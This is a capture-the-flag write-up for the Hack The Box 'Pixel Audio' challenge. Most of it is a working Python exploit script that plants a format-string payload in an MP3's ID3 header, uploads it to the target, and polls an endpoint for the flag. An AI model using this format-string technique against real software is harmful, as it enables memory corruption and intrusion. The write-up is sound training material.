Post

HackTheBox Pixel Audio Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Pixel Audio Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

import requests
import time
import sys
import os

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

def upload_file(url, file_path):
    """ Uploads a file to the server. """
    with open(file_path, 'rb') as file:
        files = {'file': ('test.mp3', file, 'audio/mp3')}
        response = requests.post(url, files=files)
    return response.status_code

def check_for_flag(url):
    """ Requests the /play endpoint to retrieve and display the flag. """
    while True:
        response = requests.get(url)
        if 'HTB' in response.text:
            print("Flag found:", response.text.strip())
            break
        else:
            print("No flag yet, retrying...")
        time.sleep(1)

def main():
    base_url = get_base_url()
    payload = 'ID3%48879c%12$n%495c%13$n'
    file_path = '/tmp/test.mp3'
    with open(file_path, 'wb') as f:
        f.write(payload.encode('utf-8'))
    print("Payload written to", file_path)
    upload_url = f'{base_url}/upload'
    play_url = f'{base_url}/play'
    print("Uploading payload...")
    if upload_file(upload_url, file_path) == 200:
        print("Payload uploaded successfully.")
        check_for_flag(play_url)
    else:
        print("Failed to upload payload.")

if __name__ == '__main__':
    main()

Summary

The Pixel Audio Challenge on Hack The Box is a medium-level challenge that introduces users to concepts like file manipulation, server communication, and exploiting vulnerabilities in file formats. In this challenge, participants reverse-engineer an audio parsing binary, craft a payload embedded in an MP3 file, and upload it to a server. The exploit manipulates the ID3 metadata to trigger a response from the server, ultimately revealing the flag. This challenge provides an excellent opportunity for those looking to gain hands-on experience with reversing, web vulnerabilities, and file-based exploitation techniques.

challenge
htb challenge writeup linux pwn
This post is licensed under CC BY 4.0 by the author.